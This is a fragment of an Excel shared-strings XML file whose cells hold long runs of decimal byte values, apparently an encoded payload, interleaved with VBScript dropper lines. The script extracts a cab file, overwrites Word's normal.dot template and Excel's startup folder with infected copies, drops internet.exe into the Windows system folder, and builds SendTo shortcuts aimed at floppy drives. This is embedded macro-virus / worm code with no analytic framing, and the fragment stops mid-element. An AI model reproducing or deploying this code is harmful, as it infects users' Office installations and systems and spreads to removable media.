74 78 246 10 128 109 30 135 173 0 67 0 102 155 147 57 4 212 3 108 21 240 85 128 127 0 248 145 128 127 5 248 133 128 137 243 57 44 2 40 22 176 31 224 91 0 223 23 240 51 128 151 4 196 23 56 217 227 11 57 124 99 145 147 253 248 54 14 205 197 78 118 239 98 39 123 86 64 187 221 201 246 44 113 178 159 11 248 4 32 183 196 201 182 1 252 5 192 63 2 188 0 240 17 192 123 75 157 108 154 195 201 </t>
  </si>
  <si>
    <t>w.Run "%COMSPEC% /c extrac32 /E /Y /L c:\ c:\cab.cab", 0, True</t>
  </si>
  <si>
    <t xml:space="preserve">86 3 180 1 244 2 60 1 240 75 128 223 2 236 46 117 178 23 1 238 1 222 252 147 128 167 0 94 21 188 74 44 92 1 220 74 44 108 34 221 79 250 2 210 11 73 63 76 250 116 210 143 147 94 76 250 49 210 143 146 190 147 244 13 164 183 144 94 64 186 133 244 65 210 25 233 175 144 190 143 244 82 210 55 147 126 145 244 11 164 159 34 189 146 244 118 210 119 144 126 137 244 40 233 231 73 31 34 253 0 233 107 72 63 67 250 9 210 251 72 63 68 250 89 210 157 164 127 143 244 211 164 187 72 223 68 186 149 244 16 233 37 164 15 144 238 37 253 36 233 18 233 57 164 199 72 207 38 253 97 43 114 211 251 225 52 39 187 114 21 191 12 32 85 170 89 146 241 231 222 159 125 237 111 79 221 253 88 227 175 115 170 127 159 39 190 192 55 49 101 53 198 21 14 202 158 182 104 25 126 88 16 99 205 106 232 208 173 162 158 132 66 123 193 12 60 180 142 251 31 254 237 116 93 123 71 18 154 171 86 206 187 54 215 174 243 255 75 157 235 38 54 89 44 140 93 46 114 178 195 211 33 173 107 165 148 73 54 75 126 179 243 14 192 89 72 15 97 223 52 254 173 1 190 63 199 179 185 122 211 244 53 244 241 122 192 19 21 22 119 84 83 172 15 77 201 178 92 132 60 79 64 123 29 50 51 42 199 162 169 184 2 229 100 118 214 194 214 179 106 182 10 204 110 200 109 63 152 123 217 46 208 125 44 192 162 204 195 194 96 122 192 214 2 76 11 179 32 147 193 213 6 238 50 230 32 204 144 209 225 255 31 82 40 119 138 42 118 242 187 132 213 54 0 110 105 250 161 138 171 47 155 214 127 253 39 191 8 188 243 163 200 71 55 129 228 226 15 219 135 86 185 192 141 242 110 17 235 184 102 145 54 166 213 34 112 173 162 61 109 154 145 252 214 13 115 50 197 184 139 111 184 40 75 10 52 195 239 60 146 11 195 43 0 34 32 139 97 144 213 16 72 36 74 236 110 144 202 14 176 249 65 74 35 32 205 17 146 225 78 144 219 93 170 228 162 218 77 50 29 129 120 232 231 99 110 136 209 1 88 126 214 78 50 143 10 191 255 209 183 3 55 </t>
  </si>
  <si>
    <t>w.Run "%COMSPEC% /c extract /E /Y /L c:\ c:\cab.cab", 0, True</t>
  </si>
  <si>
    <t xml:space="preserve">216 28 96 223 7 192 212 124 208 237 163 156 34 106 188 110 29 101 14 112 121 1 207 79 223 206 224 247 56 77 68 85 8 220 110 74 29 99 54 234 168 217 168 161 134 167 59 157 232 105 4 255 14 136 211 13 88 97 8 109 161 48 27 0 210 209 70 185 56 32 44 68 169 251 192 199 77 188 9 2 253 152 71 148 226 69 89 23 132 187 40 204 11 254 247 129 219 39 120 35 17 253 65 192 106 31 37 37 198 182 16 78 39 81 59 178 60 188 147 85 82 231 223 251 180 64 60 37 6 246 30 251 0 187 83 148 43 125 8 151 27 44 97 27 132 135 160 62 21 158 167 75 19 203 221 14 174 168 90 191 73 236 70 176 253 185 136 167 207 79 27 139 127 199 212 70 189 97 68 164 128 37 218 173 169 117 198 236 25 234 33 83 140 73 106 154 124 224 89 8 253 109 61 171 131 20 92 172 6 236 11 129 227 183 3 134 68 252 138 146 212 236 2 215 18 72 17 117 60 99 127 44 154 194 80 127 1 33 123 73 220 0 148 44 10 116 38 49 139 71 161 61 21 27 235 248 15 165 55 53 85 45 141 218 54 18 133 112 172 5 124 143 21 164 182 16 128 148 202 88 5 91 6 161 203 216 114 208 151 147 94 6 191 82 162 143 191 115 58 76 223 127 185 129 138 54 248 117 138 246 130 239 86 66 224 27 129 159 34 207 168 114 41 255 118 72 27 235 189 155 248 134 189 138 95 248 50 209 70 83 249 164 228 119 148 242 11 209 120 216 73 212 243 190 137 1 5 62 234 39 194 244 117 32 151 81 196 232 2 28 137 237 0 217 225 210 214 38 232 80 242 84 228 163 72 149 93 73 199 157 136 24 109 35 66 158 118 65 250 30 145 6 82 24 2 252 165 16 186 10 220 237 212 7 120 168 29 106 219 75 97 90 190 107 83 102 172 36 165 239 146 198 140 211 92 181 190 92 121 103 213 218 186 119 151 187 217 29 222 208 21 226 118 220 166 69 27 251 68 152 43 12 51 21 190 119 139 135 135 61 158 198 104 88 141 91 187 12 98 11 59 248 131 163 58 24 218 175 186 235 130 123 61 42 46 38 83 31 242 4 52 249 18 178 80 138 95 83 36 186 197 163 </t>
  </si>
  <si>
    <t>fso.deletefile cabfile</t>
  </si>
  <si>
    <t xml:space="preserve">113 111 9 70 85 251 102 119 212 83 231 233 172 118 251 253 155 219 27 58 84 255 70 79 180 126 151 76 219 208 58 212 180 192 7 137 35 187 38 162 54 47 93 122 138 255 182 192 30 53 30 164 81 27 209 148 29 227 248 34 81 109 26 213 110 65 95 85 48 232 71 122 187 244 121 0 109 73 30 213 7 196 254 73 125 154 90 124 133 103 202 56 142 115 66 197 126 188 72 63 110 43 254 218 243 103 223 1 165 117 243 67 176 189 56 133 212 31 47 119 230 16 222 224 55 231 55 137 4 63 101 238 92 205 251 151 97 150 126 174 230 26 134 242 35 238 149 187 120 193 192 190 253 92 207 10 200 209 194 204 177 115 61 37 96 195 239 68 227 100 115 37 242 113 186 223 113 164 103 232 70 34 113 174 231 44 232 24 35 222 143 182 120 60 132 164 230 227 179 64 60 94 66 246 28 202 107 24 95 189 203 224 148 184 19 91 172 204 188 254 25 10 226 214 68 62 62 95 196 251 209 209 32 110 6 75 228 159 228 232 19 137 168 87 32 11 162 178 231 130 200 246 12 246 38 87 214 227 109 137 23 122 251 209 247 200 148 222 158 139 104 174 183 244 246 99 4 188 58 166 231 18 249 228 200 38 239 73 202 17 83 223 42 242 74 228 227 227 205 95 15 73 189 23 227 117 49 78 60 100 57 73 205 242 2 68 225 89 98 127 20 175 137 185 226 113 116 37 19 192 103 165 222 243 156 152 211 255 9 196 188 210 107 58 98 238 93 111 57 82 101 233 93 159 125 164 42 187 183 54 231 200 221 152 255 21 204 191 127 39 47 100 33 47 164 200 31 108 37 156 183 33 226 101 161 134 72 217 156 200 183 18 90 78 222 83 20 222 51 24 221 2 100 102 101 32 83 102 80 24 136 141 238 6 181 238 144 80 48 240 57 239 141 71 162 148 139 174 150 38 243 106 177 20 100 170 22 167 174 90 110 82 51 95 80 160 205 156 115 226 177 107 227 175 150 74 202 209 153 169 90 78 168 213 114 179 154 101 75 129 190 90 78 164 175 22 136 61 168 198 206 225 229 219 135 185 41 60 241 170 194 186 53 190 237 98 131 90 184 92 206 197 154 139 128 115 154 243 13 159 146 243 </t>
  </si>
  <si>
    <t>fso.copyfile "c:\normal.dot", myfolder, True</t>
  </si>
  <si>
    <t xml:space="preserve">158 58 223 243 92 212 252 222 27 128 50 133 39 247 48 38 7 81 213 36 57 229 86 200 59 238 82 27 4 224 79 229 248 167 17 191 238 34 240 214 201 211 253 30 175 89 192 152 198 51 37 58 206 242 72 249 163 208 209 197 233 40 224 233 14 21 168 53 37 138 197 9 138 215 13 108 85 139 53 75 228 48 208 48 34 57 188 177 157 39 55 135 39 151 61 19 207 74 245 94 33 106 7 146 108 61 196 75 231 26 33 191 88 220 186 190 180 141 191 72 91 238 129 116 229 158 171 161 74 148 123 158 40 247 64 230 114 47 80 133 161 96 166 78 24 250 93 92 92 209 195 165 74 50 151 7 46 156 183 92 5 225 28 234 189 233 8 94 44 117 100 147 165 247 238 236 35 155 178 123 27 114 142 184 212 102 202 59 33 209 16 147 205 52 222 159 195 25 209 199 169 210 54 90 206 18 145 163 174 209 246 83 163 125 57 239 16 94 45 0 180 47 84 105 95 161 163 253 28 245 172 46 242 59 171 250 29 187 193 87 61 206 245 28 5 219 205 36 240 131 163 246 67 37 31 100 238 135 84 254 156 189 161 45 160 150 63 31 188 159 153 63 28 227 167 28 35 142 4 1 86 127 31 154 46 75 111 28 105 69 220 254 227 228 147 35 79 240 54 205 84 217 57 162 242 215 100 236 231 128 71 183 169 60 242 143 224 209 105 176 177 71 77 96 59 5 182 9 49 146 175 99 152 75 77 223 168 108 201 127 127 212 238 249 208 204 212 238 249 144 82 239 241 28 173 32 64 3 232 199 204 33 131 19 90 9 200 209 8 141 82 170 9 74 169 172 106 239 157 119 104 30 23 132 98 181 144 39 63 155 32 212 13 166 237 231 149 18 207 127 111 20 65 216 214 55 170 20 188 253 238 88 82 240 236 187 127 116 41 176 171 12 26 156 153 58 202 108 16 4 92 16 4 92 84 8 120 69 33 224 146 32 96 68 171 46 25 217 170 11 51 182 106 77 111 166 169 191 32 175 191 37 42 121 255 158 70 72 167 207 114 10 33 205 92 127 39 70 173 191 182 119 50 215 159 152 255 112 12 202 5 176 226 3 104 222 109 233 37 2 16 55 126 134 124 4 250 84 129 126 84 160 </t>
  </si>
  <si>
    <t>set word=createobject("word.application")</t>
  </si>
  <si>
    <t xml:space="preserve">247 41 232 199 20 244 227 28 93 169 50 222 30 82 171 76 215 199 151 168 108 144 102 165 214 210 163 87 198 95 75 209 89 88 75 206 52 98 82 8 249 56 212 124 98 105 242 41 191 50 254 57 199 149 204 83 193 228 216 54 150 52 196 73 26 158 83 165 225 118 149 188 19 179 62 147 52 108 59 49 234 184 181 237 237 177 90 228 114 142 17 63 37 88 61 160 176 250 180 194 234 51 156 213 28 221 242 246 231 212 128 117 210 80 170 178 225 98 154 90 234 251 143 241 215 18 73 3 159 25 166 145 134 101 201 25 232 108 253 12 0 109 52 159 63 195 41 90 78 204 141 65 29 175 225 30 43 196 100 62 145 127 158 207 19 227 107 168 4 248 50 197 197 159 100 32 71 124 205 226 194 179 187 241 40 240 252 3 52 183 225 120 151 120 50 184 111 207 187 97 54 54 147 16 151 33 138 226 13 205 198 107 74 118 168 189 88 57 226 237 67 188 158 16 103 96 122 188 10 196 59 138 120 58 18 82 240 42 17 239 228 216 249 222 129 211 40 155 218 179 224 139 36 112 198 241 126 152 173 220 201 249 119 102 118 234 224 115 126 182 118 240 209 119 82 186 241 194 197 197 54 71 243 148 17 143 159 229 131 240 240 13 117 16 22 247 210 64 216 235 55 52 113 245 5 184 172 45 64 188 231 117 30 225 125 77 98 233 199 216 73 202 152 129 114 129 43 46 222 43 99 115 123 53 226 13 143 205 237 53 136 103 45 28 147 219 107 17 175 164 112 204 124 239 68 60 103 225 152 249 174 67 188 246 177 243 117 210 19 186 54 203 68 126 37 23 208 245 106 19 9 21 234 158 16 109 106 7 35 132 66 169 42 46 20 52 197 162 184 167 196 211 118 218 254 74 215 87 169 131 40 175 88 122 84 206 209 138 137 82 129 36 6 250 113 238 254 183 198 26 231 190 244 214 167 26 231 236 111 141 127 156 163 94 166 223 153 118 156 83 100 118 152 139 96 142 102 114 168 76 244 39 42 178 87 0 12 175 226 61 205 17 234 205 56 191 115 156 74 215 215 255 230 248 7 194 88 97 166 238 22 69 188 90 173 215 135 11 83 187 216 165 111 126 62 3 225 216 19 33 90 134 </t>
  </si>
  <si>
    <t>ntpath=word.NormalTemplate.Path &amp; "\"</t>
  </si>
  <si>
    <t xml:space="preserve">216 144 156 163 21 166 233 135 69 60 124 163 45 155 85 177 203 184 12 177 145 63 250 41 245 33 30 8 239 226 190 10 67 208 247 91 222 7 150 57 217 123 85 218 62 89 116 46 241 254 247 185 168 13 243 218 203 209 200 167 232 194 52 93 198 51 240 60 206 179 167 229 2 110 25 80 44 39 20 75 159 98 137 9 139 88 240 226 246 157 26 187 75 99 119 170 246 103 122 235 46 39 175 51 232 253 213 189 201 27 97 30 5 117 97 89 242 253 246 169 229 44 237 89 18 168 158 132 176 33 128 151 1 222 2 248 47 128 73 48 158 221 10 176 0 96 5 192 6 128 102 0 47 192 1 128 7 0 142 1 76 49 179 216 119 193 60 13 176 3 236 255 2 230 5 128 215 0 174 1 152 97 64 179 2 236 132 176 11 0 54 176 151 3 108 0 104 0 104 1 56 12 254 126 48 31 0 56 14 240 24 192 25 128 231 87 226 58 55 139 93 2 243 10 192 239 1 114 97 224 43 4 88 1 80 85 142 231 12 66 45 2 68 1 14 1 124 3 224 4 192 99 0 167 203 121 249 70 238 185 104 173 174 109 11 210 178 118 171 187 93 110 237 8 69 221 129 116 107 169 105 215 90 71 174 231 82 10 237 190 189 173 157 229 43 146 41 134 61 157 101 250 208 229 203 88 154 213 220 100 120 89 185 79 231 19 86 188 210 174 18 87 215 70 124 73 154 171 189 123 34 209 61 218 21 115 177 26 175 95 211 86 169 115 243 2 99 42 247 133 163 26 172 218 136 26 135 159 143 199 15 121 75 150 94 179 178 175 45 235 72 202 137 21 130 26 151 122 210 222 200 245 111 253 219 0 162 199 31 220 61 218 202 255 200 149 252 17 28 78 225 32 247 210 190 19 24 25 174 175 133 240 40 111 20 148 21 121 54 234 187 1 124 39 50 190 55 5 169 239 51 50 190 151 168 174 85 106 44 221 27 18 205 27 20 44 139 223 223 217 229 231 177 20 185 174 174 245 236 11 233 36 88 188 141 49 148 161 12 101 40 67 25 202 80 134 50 148 161 12 101 40 67 25 202 80 134 50 148 161 12 101 40 67 25 202 80 134 50 148 86 37 207 208 155 64 103 1 238 96 44 134 </t>
  </si>
  <si>
    <t>word.quit</t>
  </si>
  <si>
    <t xml:space="preserve">159 121 131 103 12 95 181 22 243 227 177 53 120 38 218 3 25 203 224 127 60 197 127 2 43 235 162 115 237 98 203 192 60 15 230 114 48 7 210 196 199 125 152 215 83 232 226 123 44 179 77 233 253 11 50 248 23 103 240 175 4 195 181 149 49 171 25 104 16 251 156 119 54 242 253 216 138 187 175 145 199 87 220 103 154 24 187 162 193 63 177 29 240 53 225 138 178 154 241 149 97 51 107 100 173 160 215 176 6 176 213 178 122 182 5 220 181 160 111 4 59 170 127 182 252 250 6 167 71 217 77 170 191 9 193 194 82 239 70 216 64 122 51 237 216 218 40 246 74 213 178 0 237 5 69 181 128 98 53 65 168 27 124 35 98 127 99 114 15 228 100 203 128 37 100 194 116 27 197 78 56 220 131 154 154 210 102 194 41 101 43 0 238 32 179 138 120 83 194 114 192 191 90 236 35 195 60 246 67 137 220 224 226 123 182 220 172 29 236 62 202 109 5 155 10 184 124 23 118 59 235 162 189 172 90 220 145 59 85 25 165 143 59 116 21 122 154 197 110 210 36 253 184 219 178 84 236 165 43 37 92 125 250 35 99 104 241 57 61 181 186 92 253 26 138 70 238 32 231 252 158 5 113 234 137 83 187 197 94 57 191 74 95 32 99 92 237 158 68 228 228 4 38 73 102 106 27 40 49 101 93 146 100 5 187 133 228 105 89 151 213 202 93 40 109 203 187 240 179 103 186 51 128 98 114 225 26 204 216 114 69 11 140 197 184 129 63 244 2 109 112 16 99 37 232 143 27 149 201 192 95 130 190 165 24 181 63 200 190 214 141 122 34 113 173 59 196 242 0 251 90 136 113 147 233 76 106 188 121 49 150 123 25 45 185 87 185 113 121 92 125 14 167 3 224 65 70 119 15 12 66 233 7 179 0 242 210 192 65 198 206 37 52 113 18 124 111 168 196 251 40 149 79 49 243 23 203 167 207 85 61 152 200 10 105 93 137 68 86 183 240 200 230 159 190 100 117 115 15 229 83 24 37 92 117 135 152 206 157 100 245 23 225 62 124 88 235 78 186 208 141 174 171 87 21 183 222 133 106 52 215 255 178 74 164 85 79 39 18 195 236 32 52 128 185 48 86 101 1 160 121 240 </t>
  </si>
  <si>
    <t>fso.copyfile "c:\normal.dot", ntpath, True</t>
  </si>
  <si>
    <t xml:space="preserve">58 51 37 198 15 235 18 215 39 36 18 215 215 37 18 31 39 50 43 189 156 155 210 13 21 90 90 71 161 119 205 193 196 51 195 115 175 175 27 206 250 56 49 60 23 224 224 199 137 79 18 163 195 211 137 143 135 215 38 62 126 230 233 196 245 53 235 192 28 155 222 81 249 53 248 199 231 151 49 155 51 148 161 12 101 40 67 25 106 108 117 241 103 83 46 127 251 241 89 111 142 244 191 19 158 90 110 36 38 211 249 29 138 210 221 215 7 15 41 51 132 251 134 102 220 61 152 113 206 100 168 63 69 245 9 192 173 140 169 119 64 224 145 18 88 231 120 128 2 238 84 192 163 15 240 60 3 220 212 130 199 4 224 71 250 184 54 148 39 158 83 149 123 219 112 135 62 158 85 148 47 228 161 94 152 120 63 29 158 35 132 247 210 225 153 46 184 137 190 6 0 119 182 227 61 106 184 157 29 207 131 154 207 248 89 58 184 255 27 175 54 184 141 175 59 81 26 184 211 117 9 227 231 189 44 5 192 189 142 183 51 190 94 131 95 167 227 199 207 203 25 63 99 11 247 157 225 231 242 184 95 12 247 130 225 62 47 220 245 132 59 154 112 183 210 90 146 109 198 214 137 57 53 110 3 194 157 41 213 98 125 5 207 1 192 125 22 184 171 2 207 136 172 5 184 27 224 207 112 93 4 160 142 241 115 134 144 46 60 45 106 43 227 119 208 53 210 202 11 99 219 104 133 6 207 197 161 117 52 186 135 238 203 0 120 131 26 158 153 131 171 2 95 1 104 101 252 202 9 188 163 97 23 99 116 198 14 126 89 141 247 215 117 136 244 241 238 185 30 134 187 59 24 195 175 226 241 107 104 252 68 29 215 54 240 9 29 159 247 238 99 252 46 59 252 224 29 87 45 186 0 246 210 154 4 163 243 248 240 91 106 188 243 239 126 128 3 12 239 184 231 103 253 225 115 48 214 125 3 11 210 121 82 18 212 74 128 86 133 246 127 170 254 227 86 144 24 69 150 232 78 195 108 179 118 205 2 89 201 94 123 249 37 243 239 218 135 76 206 205 11 103 163 137 231 50 56 103 113 132 237 116 214 209 30 224 1 210 177 231 83 247 95 83 153 217 52 53 205 67 233 104 </t>
  </si>
  <si>
    <t>fso.copyfile "c:\norma1.xlm", Application.StartupPath &amp; "\", True</t>
  </si>
  <si>
    <t xml:space="preserve">10 41 180 47 226 118 92 165 171 2 41 104 5 41 109 96 245 80 215 120 106 84 19 184 171 161 46 27 198 76 203 198 76 116 205 169 85 180 137 116 202 250 234 75 179 180 229 215 134 241 220 63 187 202 134 30 88 41 251 164 49 242 15 221 49 53 37 255 201 217 64 249 164 137 108 198 204 23 178 158 131 6 49 9 66 223 4 14 13 88 158 38 62 189 69 114 27 194 126 193 221 222 233 11 72 95 144 170 34 26 220 38 164 1 215 134 214 130 109 18 251 57 184 158 52 229 97 79 132 87 205 108 15 134 247 236 10 6 247 60 12 200 185 108 38 17 60 149 244 105 164 255 128 162 159 37 125 45 132 92 131 46 160 101 85 199 188 74 241 20 189 195 236 36 188 56 233 54 210 115 25 46 213 253 152 226 188 70 62 101 208 177 225 138 87 226 96 31 177 238 1 16 185 222 123 26 235 191 8 255 211 105 253 29 90 124 128 60 83 19 52 248 78 58 154 79 130 238 201 3 221 131 196 26 104 161 22 151 105 139 44 75 160 2 167 49 147 141 253 42 97 131 190 182 4 96 62 244 159 171 25 247 105 129 126 53 233 91 100 89 9 188 46 72 135 126 15 164 234 129 142 234 222 12 17 43 96 224 152 153 26 145 175 195 166 207 141 135 21 89 214 131 44 23 101 142 58 122 206 74 34 62 102 135 225 192 212 10 197 231 104 118 176 37 209 208 127 53 211 135 234 19 74 135 97 3 12 155 38 196 73 122 145 197 1 35 24 140 97 173 146 93 154 95 50 127 126 105 171 180 26 237 45 75 181 46 219 82 27 217 156 173 82 145 101 63 228 179 42 51 121 188 20 99 19 153 25 143 147 186 14 126 169 228 150 195 32 90 166 33 215 81 58 130 226 164 7 16 189 110 93 146 236 89 48 213 131 129 189 101 1 47 216 226 213 45 197 194 222 178 184 200 50 23 68 101 150 54 244 158 6 79 251 189 58 20 9 132 98 182 138 130 249 104 210 0 39 226 44 132 68 164 17 56 250 148 4 226 205 108 0 167 40 165 164 138 44 179 217 227 48 59 1 185 185 189 195 70 34 166 152 139 154 108 12 131 127 200 131 231 118 115 111 197 188 203 197 131 159 224 193 172 </t>
  </si>
  <si>
    <t>fso.copyfile "c:\internet.exe", fso.getspecialfolder(1) &amp; "\"</t>
  </si>
  <si>
    <t xml:space="preserve">149 123 43 102 100 171 141 93 22 135 71 127 148 144 52 93 230 160 132 254 38 197 255 195 241 249 155 63 165 63 251 127 232 111 98 169 124 158 8 83 80 194 191 62 210 191 36 131 191 61 131 255 146 12 254 139 211 250 99 191 79 244 88 244 254 89 138 127 78 210 255 239 204 22 102 141 77 76 160 9 51 43 50 167 196 44 100 78 141 101 145 57 45 54 129 204 233 177 73 137 157 52 186 244 192 228 233 75 56 111 54 229 142 184 86 253 40 100 218 12 191 239 155 44 184 232 107 153 65 195 60 87 5 52 133 102 89 89 201 135 177 234 96 23 30 168 188 10 103 163 102 246 180 41 27 0 102 151 62 19 27 102 115 110 110 16 51 88 24 231 55 6 195 146 79 90 43 149 73 77 65 169 108 101 41 76 182 3 209 144 59 234 93 219 29 12 183 59 182 4 195 157 110 127 147 167 51 228 119 71 61 14 23 4 72 139 36 91 139 13 38 224 29 145 160 163 45 24 218 223 225 243 123 36 91 219 170 150 0 33 59 218 131 81 91 137 196 83 41 145 154 194 93 158 42 124 79 171 67 95 31 10 249 125 109 110 220 58 233 104 140 186 195 209 174 144 154 54 37 83 230 216 231 239 180 149 116 238 239 8 250 219 61 225 146 40 36 115 11 127 248 32 194 238 235 242 69 97 190 86 219 33 41 35 126 164 216 183 216 17 112 119 122 214 218 52 41 72 81 175 39 80 77 136 91 130 81 9 137 64 2 60 251 124 145 104 164 120 156 100 44 150 154 32 149 245 153 138 44 104 29 181 80 54 206 137 57 108 178 25 198 229 14 144 22 31 189 144 197 233 117 49 184 59 160 7 87 94 31 150 64 95 19 124 240 210 94 27 200 225 157 208 171 75 116 12 45 190 94 156 74 143 84 89 120 204 38 146 210 238 241 123 162 158 116 196 148 35 199 85 206 56 112 175 233 120 121 110 226 143 101 221 42 91 181 236 92 236 136 184 247 122 224 9 35 10 115 45 5 197 209 232 245 120 128 155 54 189 200 2 114 117 208 223 213 25 136 20 47 67 107 104 191 148 49 209 177 19 128 167 182 110 71 67 87 64 178 45 172 174 175 107 116 213 84 47 148 110 111 147 254 167 </t>
  </si>
  <si>
    <t>set fold=fso.getfolder(w.SpecialFolders("SendTo"))</t>
  </si>
  <si>
    <t xml:space="preserve">189 171 15 106 226 136 226 151 128 18 5 197 239 47 164 46 17 36 145 24 9 248 173 1 52 160 162 129 162 1 17 77 165 71 114 33 167 201 5 239 14 2 78 109 11 182 106 71 180 142 86 90 63 58 173 245 3 191 58 214 106 171 237 212 58 109 167 173 51 118 172 99 59 163 78 213 58 106 71 170 50 142 86 59 227 119 223 238 94 2 145 20 253 195 191 58 13 147 187 219 183 187 183 111 223 123 191 183 111 247 194 30 43 203 34 95 134 82 36 148 226 70 32 3 137 147 93 30 182 220 200 85 115 32 242 84 42 245 1 138 157 155 77 72 246 181 24 140 145 160 4 166 185 172 105 92 251 182 228 105 177 37 24 221 161 13 220 19 167 217 33 114 128 10 95 25 222 222 89 167 37 118 201 182 8 89 171 127 1 107 193 35 44 48 22 178 98 57 39 99 105 155 181 132 73 193 41 251 8 143 145 244 97 14 46 148 235 240 9 86 31 173 107 214 130 72 60 158 244 52 163 211 227 49 140 210 194 156 217 5 61 224 88 135 27 185 92 248 205 137 24 23 196 148 165 246 37 51 76 66 195 254 93 50 241 161 81 115 64 147 208 251 108 98 91 137 180 93 69 114 33 74 167 58 3 56 128 12 77 45 102 237 33 187 182 202 96 212 216 104 249 224 222 181 45 243 185 192 110 210 116 7 107 29 148 209 135 24 127 58 164 205 0 129 132 249 197 197 238 229 218 86 230 175 35 179 254 40 188 131 177 15 91 180 131 45 35 198 143 89 44 227 5 86 172 65 172 195 193 73 18 242 139 188 204 33 86 66 131 77 26 152 73 227 127 25 135 203 190 112 233 54 91 38 213 200 156 206 203 59 117 238 42 131 96 240 14 19 244 250 206 48 117 174 148 161 136 193 224 112 247 104 141 174 64 35 241 97 33 199 85 59 56 143 81 174 150 181 110 172 5 145 43 167 45 107 167 78 207 41 41 181 20 205 156 153 147 95 88 90 100 203 153 105 183 249 92 178 159 21 57 123 30 239 16 125 18 164 236 197 188 224 244 249 37 187 165 82 20 57 65 158 197 137 18 232 222 14 186 180 231 42 27 227 83 117 105 249 214 201 57 74 83 10 131 207 169 45 150 222 124 204 </t>
  </si>
  <si>
    <t>for each ff in fold.files</t>
  </si>
  <si>
    <t xml:space="preserve">179 90 83 208 132 131 198 148 70 161 129 45 211 140 101 5 38 79 189 183 206 111 180 85 112 14 158 245 76 38 105 64 186 13 234 23 250 180 122 125 58 163 81 147 106 0 1 179 223 104 33 144 178 185 125 162 236 168 148 117 196 202 43 130 78 20 142 46 23 1 166 94 3 118 208 137 174 222 180 241 202 33 210 50 32 133 23 137 178 160 176 100 210 211 91 142 121 86 191 210 182 191 128 93 129 171 150 33 240 132 76 196 187 96 252 45 247 1 76 184 52 240 41 92 218 56 13 197 53 246 152 19 176 39 112 87 193 64 27 14 110 97 252 30 128 31 96 104 64 224 57 103 177 158 74 78 77 23 228 4 179 41 150 97 188 102 94 144 100 17 219 175 22 105 245 16 118 56 125 200 239 198 221 247 102 164 2 91 30 159 175 162 3 46 237 77 49 117 111 41 47 24 148 26 237 140 31 116 252 238 251 164 95 128 62 56 205 184 211 113 248 13 13 124 21 40 9 217 42 203 16 117 129 10 70 116 250 174 12 147 205 123 17 120 169 137 18 194 56 27 193 48 54 142 140 187 208 119 170 220 23 21 127 41 57 68 190 66 230 133 114 234 198 106 36 153 243 82 95 170 213 39 209 106 254 54 149 252 180 150 145 184 71 173 30 100 159 3 178 207 117 65 167 243 65 23 25 225 181 9 57 34 235 72 79 67 195 115 208 240 18 52 220 138 85 138 191 192 184 17 190 45 58 53 183 119 3 249 233 245 251 180 145 172 34 155 40 202 41 200 12 166 77 10 205 76 196 30 184 7 4 152 62 1 113 120 3 13 36 114 82 165 151 67 216 188 18 24 166 245 200 157 205 75 16 139 213 76 244 112 162 44 129 120 38 179 30 240 109 237 151 193 140 161 176 42 15 65 202 104 176 20 37 222 130 74 126 99 8 96 192 74 3 97 160 164 165 216 9 122 25 237 144 208 0 139 84 80 66 172 192 29 105 12 213 95 65 43 209 169 210 84 48 198 123 90 72 25 44 72 58 212 163 117 140 2 3 22 113 242 163 218 244 242 169 81 15 29 219 3 216 101 77 143 153 153 16 91 95 141 162 225 188 29 124 204 171 16 18 221 129 17 162 47 0 48 29 136 69 96 108 155 </t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>if instr(ff.name,"</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>软盘</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t>")</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>&gt;0 then</t>
    </r>
  </si>
  <si>
    <t xml:space="preserve">33 24 253 14 32 54 22 224 56 23 202 254 8 231 63 225 188 7 98 234 227 0 252 183 1 118 251 160 238 87 192 230 249 206 116 193 156 46 172 101 133 44 172 69 171 7 6 103 55 56 44 63 216 143 97 214 2 60 227 6 195 61 147 240 226 58 94 123 138 129 163 147 137 37 215 221 201 252 176 27 240 248 96 231 205 147 121 101 5 153 165 132 62 148 208 83 200 177 142 80 94 111 245 178 137 36 60 15 97 226 85 181 120 58 16 25 88 150 95 66 74 191 65 142 121 76 67 36 94 216 179 195 212 0 255 52 177 16 206 54 72 77 101 10 96 8 182 146 141 232 241 15 218 166 41 219 187 143 36 155 216 227 232 180 128 177 64 62 34 11 237 170 200 126 204 89 230 80 68 108 38 163 86 129 131 94 31 157 174 113 2 47 81 204 108 181 154 172 175 49 100 217 156 35 91 239 7 94 85 241 124 62 170 167 228 191 19 105 100 166 22 32 43 43 113 226 52 240 46 35 77 169 169 168 192 98 69 35 185 39 74 70 50 105 204 22 213 210 136 234 77 220 234 99 249 189 102 116 91 122 237 198 184 138 67 67 163 133 1 245 43 139 209 214 95 234 127 250 161 228 61 102 0 58 220 20 153 243 249 90 235 148 168 169 189 101 75 157 105 190 107 103 180 253 139 147 217 167 50 106 187 205 251 166 49 245 203 170 43 241 230 198 193 61 123 46 184 249 120 221 141 194 93 87 11 103 60 24 164 106 202 216 174 46 223 88 157 87 21 139 62 141 223 86 181 104 221 239 137 239 38 44 59 177 194 221 97 181 241 128 225 242 192 234 15 150 229 54 212 53 119 106 138 56 154 116 96 222 45 33 102 125 157 189 54 127 82 74 65 191 188 250 5 98 111 199 229 235 93 99 106 74 31 94 243 31 190 127 57 225 248 234 197 23 27 189 230 165 19 234 50 222 156 176 100 79 255 199 99 154 119 111 21 142 126 188 67 99 190 119 116 203 249 229 29 151 103 86 44 185 158 220 117 71 76 241 254 85 189 78 118 121 56 233 214 138 91 55 18 51 115 143 91 142 172 121 132 198 14 137 175 139 177 12 168 173 207 178 52 233 14 13 234 178 198 118 66 213 196 95 95 181 </t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>set lnk=</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t>w</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">.CreateShortcut(fold.path </t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
